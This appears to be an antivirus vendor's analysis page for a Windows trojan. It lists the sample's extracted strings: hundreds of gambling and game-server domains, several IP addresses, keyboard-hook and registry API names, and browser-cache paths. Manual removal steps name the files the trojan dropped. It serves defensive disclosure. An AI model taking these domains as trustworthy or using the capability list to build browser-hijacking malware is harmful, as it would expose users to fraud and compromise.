boan83.com
bocaijing.com
bogou888.com
bs0055.com
bwin0055.com
bwin2003.com
bwin2020.com
bxz2017.com
ca7766.com
cate.syd.com.cn
cc0033.com
cczhb.com
chinabreed.com
chunv55.com
clever-china.com
club366.net
cmp8d.com
cqgj0.com
cqwywudao.com
csqclt.com
csywzc.com
daben08.com
dafa888.asia
dafa888.cm
dafa888.com
dafa91.cn
dafabet.com
danbao002.com
dazhengjiaoyu.com
dc1108.com
dd0044.com
ddh111.com
df011.com
dh2665.com
dh5524.com
dhy0022.com
dhy8855.com
dlzywzj.com
dqxswzxd.com
ds61888.cn
dxstudy.com
dy7777.com
dy8811.com
echina365.com
emai60.com
f402.com
fa74955.com
fa97463.com
feibo4.com
feibodr111.com
ff366.net
game88city.com
gaxinshili.com
gcgc915.com
gdhzxd.com
gds678.com
gdzfcn.com
gf9922.com
glyn88.com
gtlivegaming.com
guo400.com
gzsanli.com
h88eg.com
hailifang.com
hainei.org
hanquantz.com
hao555666.com
haomatang.com
happybannerfarm.com
hb3333.com
hb9599.com
hd182.net
hd9599.com
hellocareer.net
heshangmeng.net
hf6222.com
hg0088.com.so
hg0088.net
hg2288.oi
hg5987.com
hg9801122.com
hga8800.com
hgbet222.com
hgw025.com
hgw1109.com
hgw9983.com
hjzs888.com
hqshuaimi.com
hudabo07.com
hvwin99.com
hystsn.com
ifeng888896.com
jaymacawards.com
ji586987.com
jichenco.com
jin3388.com
jin5088.com
jinleyigou.com
jinniu30.com
jinniu40.com
jiuwuzhizun00.net
jiuwuzhizun11.cc
jiuwuzhizun11.com
jiuwuzhizun6.cc
jiuwuzhizun6.com
jjxieqiaoxx.com
jkg1.cc
jkgdq.com
jkgqm.com
jkgqs.com
jkgqt.com
jkhhq.com
jn12345.com
js00697.com
js15.cndatian.com
js9980.com
jsc9988.com
jucai234.com
justoa79.com
jvnongbao.com
jwzzgw.cc
jwzzgw2.com
jwzzgw4.cc
jwzzgw6.cc
jwzzgw6.com
jxdfsh.com
jxftech.com
jxnanhu.com
jyd900.com
k178.vcevv.cn
k5911.com
kaqiduoyoule.net
kingdynasty.cn
kkkk0166.com
live.sobifen.com
live.titan007.com
lkj9875.com
long772.com
long8.cc
lvyinba.com
lxyl32.com
m88help.net
mg000.com
mg1555.com
milan86.com
mmtx77.com
mmxx55.com
moca777.com
mry3311.com
mtmkite.com
my63303.com
n0178.com
naixiu33.com
nbboard.com
newbet6.com
ningbofojiaowang.com
niuhubo8.com
nswzsd.com
ob1818.vip
olog648.top
pay6524.com
pj3516.com
pp88086.com
px0311.com
qiangui666.com
qiangui678.com
qingree.com.cn
qpl777.com
qwe654.com
VVV.qn889.com
qy0707.com
qy8100.com
rm726.com
rr678uu.co
s88ab.com
s8s.cc
sandu.la
sanrasoft.com
sbd777.com
score.365rich.cn
sdrdwh.com
sf135.net
sg.bjh20.com
shangshangchuanmei.com
sheser.com
shgw123.com
simple-elec.com
sqzl99.com
szbcfs.net
szjiuyou.com
t5252.com
taohuajiang.net
taotietem.com
tbbet8888.com
tbet88.com
tbfastfast888.com
tlc187.com
tongbo8888.com
ty1299.com
ty1400.com
ty442.com
ty443.com
tycjt1.com
uartaiz.com
up8090.com
upup.bbinma.com
usot399555.cn
uu11.cc
v8293.com
vic115.com
vic76.com
vip1922.com
vip345345.com
vns255.com
vns86.net
vtm006.com
w11e2.com
w6603.com
w88top.com
w88wap.com
weebly.com
wns0028.com
wns707.com
wofacai.com
VVV.0008.com
VVV.0029.com
VVV.012219.com
VVV.0177.com
VVV.01bc.com
VVV.06919.com
0951wx.com
VVV.1076.com
VVV.10816.com
VVV.111146.com
VVV.11303.com
VVV.11567.com
VVV.11sbc.com
VVV.138k.cc
VVV.145a.com
1524dh.com
VVV.156789.com
VVV.171100.com
VVV.177570.com
VVV.187203.com
VVV.20158.com
VVV.21222.com
VVV.2126e.com
VVV.2138s.com
VVV.224499.com
VVV.2246.com
VVV.22559.com
VVV.23036.com
VVV.23456.com
256s8s.me
VVV.257700.com
VVV.293477.com
VVV.30333.net
VVV.307250.com
VVV.31999.com
VVV.338ff.com
VVV.3505.com
VVV.36088l.com
VVV.365365.com
VVV.365445.com
VVV.39366.com
VVV.400444.com
VVV.4267.com
VVV.43336.com
VVV.4355.com
VVV.4616.com
VVV.4662.com
VVV.4707.com
VVV.478001.com
VVV.478009.com
VVV.48111.com
VVV.4886m.com
VVV.49499.com
VVV.55365.net
VVV.565.net
VVV.56666.net
VVV.58js.com
VVV.61cctv.com
VVV.63365.com
VVV.635005.com
VVV.656995.com
VVV.6590a.com
VVV.6590b.com
VVV.6590d.com
VVV.660022.com
VVV.6625ss.com
VVV.665252.com
VVV.666111.com
VVV.68mtv.com
VVV.710.co
VVV.710j.com
VVV.710jc.com
7689js.com
VVV.789990.com
VVV.7919.cc
VVV.793023.com
VVV.79709.com
VVV.7999.cc
VVV.7m.cn
VVV.7y163.com
VVV.80166.com
VVV.80456.com
VVV.80797.com
VVV.84777.com
VVV.869999.com
VVV.87pt8.com
VVV.87top.com
VVV.880ms.com
VVV.8-88d.com
VVV.88928.com
88jt.cc
88jt.net
VVV.895858.com
VVV.8edy.com
VVV.8ff77.com
VVV.8k018.com
VVV.9177b.com
VVV.9178b.com
VVV.91bcd.com
VVV.91ent.com
9599aa.com
9599gg.com
VVV.968yh.com
999jnh.com
VVV.abepk.com
VVV.ag983.com
VVV.ajtgl.com
VVV.am11.com
VVV.anhui365.net
VVV.ay017.com
VVV.ay039.com
VVV.ay741.com
VVV.ay951.com
VVV.aygj5.com
VVV.b138.cc
b22138.com
VVV.bb868.com
VVV.bebio.net.cn
VVV.bg33k.com
VVV.bmw7.com
VVV.bmw9.com
bo7727.com
VVV.bo88.com
VVV.bxchc.com
VVV.bxcho.com
VVV.bxchp.com
VVV.c77c.com
ca0033.com
VVV.ca151.com
VVV.ca518.com
VVV.ca88.com
VVV.ca881.com
VVV.ccav5.com
cd-cszs.com
VVV.chnfq.com
VVV.cmp8.com
VVV.cn-ady.com
VVV.co1860.com
VVV.cqqggqw.com
VVV.cr1118.com
VVV.cs0759.com
VVV.dc0066.com
VVV.df888.com
VVV.dfbet.com
VVV.dfbet.net
VVV.du001.com
VVV.dy985.com
VVV.earui.com
VVV.farmer.com.cn
VVV.fmu8.com
VVV.godocha.com
VVV.hfyj.net
VVV.hi688.net
VVV.hj696.com
VVV.hjd56.com
hllzsxa.com
VVV.hnyqty.com
VVV.ht51.com
VVV.hv500.com
VVV.itb66.com
VVV.itb88.com
VVV.j331.com
VVV.jkhwq.com
VVV.jnh8.com
VVV.jxhu.com
VVV.kefu68.com
dgvictoria.com
sqslwang.com
6x6bct.com
qiye-dianping.com
shanyuansc.com
mw-electronics.com
emeipai.net
VVV.kl-cti.com
VVV.kur99.com
VVV.ll-49.com
VVV.m402.com
VVV.m99.com
VVV.mbet.cc
meihuale.com
mf9999.com
VVV.mfzbs.com
VVV.mg.cc
VVV.mg123.cm
VVV.mngye.com
VVV.mph4.cn
VVV.mr007.com
VVV.nxbyjt.com
VVV.p99.com
VVV.pgpop.com
VVV.pj686.com
VVV.ppp36.com
VVV.qn628.com
VVV.qoyari.com
VVV.qy459.com
ranshao.com
VVV.s138x.com
VVV.s138y.com
VVV.safea.gov.cn
sbdvip.com
VVV.sctv.com.cn
VVV.sdw11.com
VVV.shhbm.com
VVV.sopoer.com
VVV.t1889.com
VVV.tjjsd.com
VVV.ts8.org
VVV.ty06.com
VVV.tyc.com
tycyyy.com
VVV.ub58.com
VVV.v524.com
VVV.v7080.com
VVV.vic5.com
VVV.vn66.com
VVV.w88.com
VVV.wj880.com
VVV.x6168.com
VVV.x8832.com
VVV.xy306.com
VVV.y8.cc
VVV.y9.cc
VVV.y9.tt
VVV.yh478.net
VVV.yh88.com
yl2222.cc
yl8886.com
ylg8003.com
VVV.yqjnt.com
VVV.yxlm.cc
VVV.yxlm.com
VVV.zxx7.com
www-002.com
www-004455.com
www-1005.com
www-1307.com
www-23456.com
www-43899.com
www-55977.com
www-57365.com
www-80999.com
www-887700.com
wxc7700.com
wxjixing.com
x33138.com
x5660.com
x993.com
x9988111.com
xam31999.com
xbao99.com
xbyl345.com
xc333.top
xin1946.com
xinbao169.com
xinyu588.com
xiudu868.com
xj38a.com
xx2007.com
xyx5188.com
y33138.com
y8b88.com
yb633.com
yccrab.net
yidali11.com
yilin027.com
ying993.com
yinhemmm.com
ykdiman.net
yl0000.org
yl882288.com
ylg2099.com
ylg2299.com
ylg6266.com
ylg6366.com
ylg6696.com
ylg8838.com
ylg8999.com
ylg9099.com
ylg9999.com
yo56378.com
yo84756.com
yo86567.com
youle44.com
youyou456.com
yrmt168.com
yrmt321.com
yubojiu.com
yuebet188.com
yuefabo.com
yusheedu.com
yyhanmai.com
yyy588.com
yz188.com
yzc1188.com
yzc178.com
yzc262.com
yzc363.com
zcxtzx.com
zgbetter.com
zggpcps.com
zr88a.cc
ztc-fz.com
ztgryfv.com
zuijiabo.com
zviwmeb.com
zz402.com
zz565.net
zzxh371.com
zzxinhangdao.com
VVV.17ycw.cn
calrafini.com
shantingst.com
xingfumimi.com
aweifile.com
wzhongxing.net
118.178.243.200
lanuor.net
kailemusic.net
yaomishi.com
xiamenpainting.com
zhkingpower.com
ruichihongjiu.com
szymtjy.com
www1.juyhf.com
121.40.239.48
188ks.com
VVV.20shopping.com
VVV.xc185.com
VVV.wa0592.com
VVV.xinly.net
dantouqibing.com
19771128.com
baitafengshui.com
xhnjt.cc
47.89.59.67
021sjjc.com
wy.92wy.com
99j.com
66169.com
91yidao.com
mishicq.com
8090cqg.com
860580.com
345zx.com
VVV.melaleuca.com.cn
45woool.com
hhgft.com
eachinfo.com
ucbug.com
VVV.44tf.com
haof.44tf.com
sfacg.com
xyxzgw.com
121.41.16.196
941pojie.com
162.212.181.20
93yd.com
haofupk.com
99inf.com
VVV.ssswm.com
s1904.com
99ting.cn
VVV.wowms.com
mc520.com
VVV.wan50.com
VVV.wf998.com
20shopping.com
net.17ycw.cn
1234567edu.com
VVV.559u.com
VVV.wg941.com
tg.mshax.com
taitognpump.com
52345.cn
921pt.com
52anzu.com
122.224.33.49
xingzhaohao.com
30ok.com
haosf.me
haosf.ws
99s.com
huzu123.com
268pk.cn
520jdwg.com
s.h1995.com
VVV.54dc.com
cqhaobangshou.com
haosf.tv
swufe.net
shutu.cc
54zz.com
markosweb.com
33sf.com
44145.wang
44134.wang
192yx.com
shenqi.com
175sf.com
sf999.com
fu.juyhf.com
2688tc.com
grrfg.com
sf822.com
rxjh45.com
zhaosf.mobi
zhaowoool.com
sewsx.com
015999.com
VVV.93u.com
ditulao.com
sf999.ws
shangjz.com
cydfh.com
zhoupuinc.com
zmdsnjtgw.com
cqw6.com
hangzhou.aliyuncs.com
zlyzpw.com
uu171.com
cuwoool.cn
1778st.com
183.131.85.133
18wanmei.com
72714.wang
9kf.com
bibuzhengrong.com
cq697.com
d34dd.com
dj665.com
kofbobo.net
kongzhifamen.com
wanwan88.com
VVV.97mc.com
VVV.qiqiweb.com
VVV.vivi2.com
wxyongshang.com
zhaokf.com
zhaosf.cc
sf123uu.com
C:\Windows\system32\winlogon.exe
C:\Windows\SYSTEM32\ntdll.dll
C:\Windows\SysWOW64\wxpolice64.dll
C:\Windows\Explorer.EXE
C:\Windows\system32\SHELL32.dll
C:\Windows\system32\SHLWAPI.dll
C:\Windows\system32\fxsst.dll
C:\Windows\system32\msvcrt.dll
C:\Windows\System32\MMDevApi.dll
C:\Windows\system32\WINMM.dll
C:\Windows\system32\UIAutomationCore.dll
cacls.exe
extrac32.exe
wiaacmgr.exe
net.exe
sfc.exe
sort.exe
taskkill.exe
timeout.exe
wininit.exe
xcopy.exe
netsh.exe
notepad.exe
regedit.exe
reg.exe
rundll32.exe
cmd.exe
{C6CBEC98-70B9-4991-8CE5-5D846D28740C}
{60853F8B-2218-49CF-A58D-2561B9550406}
.dll, RunIt
C:\Windows\sysnative\Drivers\
%s [%8X][%d]
TMyIdTCPServerEventCall
TMyIdUDPServerEventCallU
NTDLL.DLL
$%X,$%X; $%X,$%X; %d KB
PubwinClient.exe
.hao123.com
VVV.baidu.com/
hXXp://
$%X,$%X; $%X,$%X;
123.sogou.com
123abc.dll
lass.exe
fash.exe
txupd.exe
PPAP.EXE
TENCENTDL.EXE
TMyCheckOpenUrl
TDRIVER_UrlWatchList
VVV.2345.com
a.baidu.com
c.baidu.com
s.baidu.com
cb.baidu.com
cbjs.baidu.com
sclick.baidu.com
dict.baidu.com
gimg.baidu.com
n.baidu.com
nsclick.baidu.com
picache.baidu.com
share.baidu.com
suggestion.baidu.com
s1.bdstatic.com
vie.baidu.com
rwyNCMc.exe
play.bat
hXXps://123.sogou.com/?71156-5497
hXXp://VVV.ip.cn/
b~~z0%%cz$ndyorc~$ieg%
pWin7Server.exe
CLSID\{0002DF01-0000-0000-C000-000000000046}\LocalServer32
internet explorer\iexplore.exe
KERNEL32.DLL
360Chrome\Chrome\
CacheIE\Content.IE5
Content.IE5
SogouExplorer\Webkit\Default\
Google\Chrome\
Opera\Opera\
application_cache\cache_groups.xml
Mozilla\Firefox\Profiles\
AppData\Local\Microsoft\Windows\
;8=$:$:$;
00-00-00-00-00
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards
SoftWare\Microsoft\Windows NT\CurrentVersion\NetworkCards\
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_CURRENT_CONFIG
HKEY_DYN_DATA
SetRegKey Error:
*.lnk
*.url
%d.%d.%d.%d
hinthk.dll
http:
deflate 1.2.8 Copyright 1995-2013 Jean-loup Gailly and Mark Adler
inflate 1.2.8 Copyright 1995-2013 Mark Adler
;3 #>6.&
'2, / 0&7!4-)1#
-t}cy
=<;:9876543210/.-, *)('&%$#"!
.fQt7
.OX4a
^&%D\H
j6.bm2
).Kdn
&%S[)
.qV1l
-K9.rR[#
.FGzl
.mC)*
8h'PGŒ
=,.Qw
m*>.KnW
Ct.NA
.IYj<&_
U%s[*
 wR%c
:.on,.
.Eo{ms
8 [D.ns
 '~%Uo
:%XG?
.gU*Y
Uq`%x?\
L.PYv
.uQ0<
>qzBM%D
6gdg%S.
\Ÿ7g
.Uea|S
n,X%uR
6?~%s
h%d$nC
.jelX
?456789:;<=
!"#$%&'()* ,-./0123
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
RegSetKeySecurity
RegNotifyChangeKeyValue
RegEnumKeyExA
RegDeleteKeyA
RegCreateKeyExA
GetWindowsDirectoryA
GetProcessHeap
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
shell32.dll
ShellExecuteA
SHFileOperationA
wininet.dll
FindNextUrlCacheEntryA
FindFirstUrlCacheEntryA
FindCloseUrlCache
DeleteUrlCacheEntry
URLMON.DLL
UrlMkGetSessionOption
ADVAPI32.DLL
wsock32.dll
GetProcessHandleCount
Rpcrt4.dll
OLEACC.DLL
333333333333333333
33333833
3333339
3333333333333338
:*"*"$3338
3333333
33333333
33333333333
3333333333338
33338?383
333333333333
:*3:"$3338
333333333333333
KWindows
UrlMon
IdTCPStream
 IdTCPServer
0IdHTTPHeaderInfo
MyHTTPSProxyRF
((&)))!&$
%)01$$'&,--%
38000=344
1 0 .'7(2':
- /*-( ,''.-!$$$&'(/*) ,*/.)*72-9
87\22,-!(6!
No help keyword specified.
OLE control activation failed*Could not obtain OLE control window handle%License information for %s is invalidPLicense information for %s not found. You cannot use this control in design modeNUnable to retrieve a pointer to a running object registered with OLE for %s/%s=Instruction TLB, 4Kb pages, 4-way set associative, 32 entries
Clipboard does not support Icons/Menu '%s' is already being used by another form
No help found for %s#No context-sensitive help installed$No topic-based help system installed
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Metafile is not valid!Cannot change the size of an icon Invalid operation on TOleGraphic
Unsupported clipboard format
Command not supported.
Address type not supported.$Error accepting connection with SSL.
Error creating SSL context. Could not load root certificate.
Could not load certificate.#Could not load key, check password.
SSL status: "%s"
Request rejected or failed.5Request rejected because SOCKS server cannot connect.QRequest rejected because the client program and identd report different user-ids.
0Address family not supported by protocol family.
Socket is not connected..Cannot send or receive after socket is closed.#Too many references, cannot splice.
Operation would block.
Operation now in progress.
Operation already in progress.
Socket operation on non-socket.
Protocol not supported.
Socket type not supported."Operation not supported on socket.
Protocol family not supported.
*Error on call Winsock2 library function %s&Error on loading Winsock2 library (%s)
Resolving hostname %s.
Connecting to %s.
Chunk StartedDThis authentication method is already registered with class name %s.
%s is not a valid service.
Socket Error # %d
%s is not a valid IP address.
File "%s" not found1Only one TIdAntiFreeze can exist per application.
No execute handler found.
No data to read.$Can not bind in port range (%d - %d)
Invalid Port Range (%d - %d)
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters
Connection Closed Gracefully.;Could not bind socket. Address and port are already in use.4Failed attempting to retrieve time zone information.
'%s' is an invalid mask at (%d)$''%s'' is not a valid component name
Invalid property value List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d) Out of memory while expanding memory stream
Error reading %s%s%s: %s
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Unable to write to %s
Operation not supported
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
Invalid variant operation
Invalid NULL variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d

f23bb1c179d6ccab543d15af98e5eea.exe_260_rwx_02B50000_00003000:

<requestedExecutionLevel level="requireAdministrator"/>
kernel32.dll
user32.dll
GetKeyboardType
advapi32.dll
oleaut32.dll
version.dll
gdi32.dll
ole32.dll
comctl32.dll
shell32.dll
ShellExecuteA
wininet.dll
FindNextUrlCacheEntryA
URLMON.DLL
UrlMkGetSessionOption
wsock32.dll
ntdll.dll
psapi.dll
Rpcrt4.dll
OLEACC.DLL

SearchProtocolHost.exe_1084:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
MSSHooks.dll
IMM32.dll
SHLWAPI.dll
SrchCollatorCatalogInfo
SrchDSSLogin
SrchDSSPortManager
SrchPHHttp
SrchIndexerQuery
SrchIndexerProperties
SrchIndexerPlugin
SrchIndexerClient
SrchIndexerSchema
Msidle.dll
Failed to get REGKEY_FLTRDMN_MS_TO_IDLE, using default
pfps->psProperty.ulKind is LPWSTR but psProperty.lpwstr is NULL or empty
d:\win7sp1_gdr\enduser\mssearch2\common\utils\crchash.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrdmn\fltrdaemon.cxx
d:\win7sp1_gdr\enduser\mssearch2\search\common\include\secutil.hxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracerhelpers.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
</MSG></TRC>
<MSG>
<ERR> 0xx=
<LOC> %s(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%s"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%s"
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
SHELL32.dll
PROPSYS.dll
ntdll.dll
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
MsgWaitForMultipleObjects
SearchProtocolHost.pdb
2 2(20282|2
4%5S5
Software\Microsoft\Windows Search
https
kernel32.dll
msTracer.dll
msfte.dll
lX-X-X-XX-XXXXXX
SOFTWARE\Microsoft\Windows Search
tquery.dll
%s\%s
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
advapi32.dll
WAPI-MS-Win-Core-LocalRegistry-L1-1-0.dll
winhttp.dll
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<LOC> %S(%d) </LOC>
tagname="%S"
logname="%S"
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
Microsoft Windows Search Protocol Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchProtocolHost.exe
Windows
7.00.7601.17610

SearchFilterHost.exe_3616:

.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
ntdll.DLL
KERNEL32.dll
msvcrt.dll
USER32.dll
ole32.dll
OLEAUT32.dll
TQUERY.DLL
IMM32.dll
MSSHooks.dll
mscoree.dll
SHLWAPI.dll
d:\win7sp1_gdr\enduser\mssearch2\search\search\gather\fltrhost\bufstm.cxx
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\mutex.cpp
RegDeleteKeyW
RegDeleteKeyExW
8%uiP
d:\win7sp1_gdr\enduser\mssearch2\common\include\srchxcpt.hxx
Invalid parameter passed to C runtime function.
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracersecutil.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.cpp
-d-d-d-d-d-d-d-%d
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\tracmain.h
d:\win7sp1_gdr\enduser\mssearch2\common\tracer\sysimprs.cxx
RegCloseKey
RegCreateKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ReportEventW
_amsg_exit
SearchFilterHost.pdb
version="5.1.0.0"
name="Microsoft.Windows.Search.MSSFH"
<requestedExecutionLevel
3 3(30383|3
kernel32.dll
Software\Microsoft\Windows Search
SOFTWARE\Microsoft\Windows Search
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
Windows Search Service
tquery.dll
advapi32.dll
API-MS-Win-Core-LocalRegistry-L1-1-0.dll
<Exception><HR>0xx</HR><eip>%p</eip><module>%S</module><line>%d</line></Exception>
Software\Microsoft\Windows Search\Tracing
Software\Microsoft\Windows Search\Tracing\EventThrottleLastReported
Software\Microsoft\Windows Search\Tracing\EventThrottleState
<MSG>
<ERR> 0xx=
<LOC> %S(%d) </LOC>
tid="0x%x"
pid="0x%x"
tagname="%S"
tagid="0x%x"
el="0x%x"
time="d/d/d d:d:d.d"
logname="%S"
</MSG></TRC>
Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11CF-8B85-00AA005B4383}
.\%s.mui
.\%s\%s.mui
%s\%s.mui
%s\%s\%s.mui
%s\%s
winhttp.dll
Microsoft Windows Search Filter Host
7.00.7601.17610 (win7sp1_gdr.110503-1502)
SearchFilterHost.exe
Windows
7.00.7601.17610


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Scan a system with an anti-rootkit tool.
  2. Terminate malicious process(es) (How to End a Process With the Task Manager):

    %original file name%.exe:1024

  3. Delete the original Trojan file.
  4. Delete or disinfect the following files created/modified by the Trojan:

    C:\Windows\mbHtGKAn.dll (12 bytes)
    C:\ProgramData\pDcYLpIG\f23bb1c179d6ccab543d15af98e5eea.exe (2264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk (2 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\safebrowsing (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\Cache.Trash7417 (4 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk (1 bytes)
    C:\Users\Public\Desktop\Mozilla Firefox.lnk (1 bytes)
    C:\Windows\LMJxkS.dll (10 bytes)
    C:\Windows\wrhKvXr\yAXHMEya.tmp (12 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk (1 bytes)
    C:\Users\"%CurrentUserName%"\Favorites\Links\Web Slice Gallery.url (272 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk (1 bytes)
    C:\Windows\wrhKvXr\hDuVSc.dll (16661 bytes)
    C:\Windows\wrhKvXr\lMmgfUJPh.dll (264 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Mozilla\Firefox\Profiles\5a2ce8gs.default\cache2\entries (600 bytes)
    C:\Users\Public\Desktop\Google Chrome.lnk (2 bytes)
    C:\Windows\System32\14532e\CDClient_EX.sys (117 bytes)

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2025 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now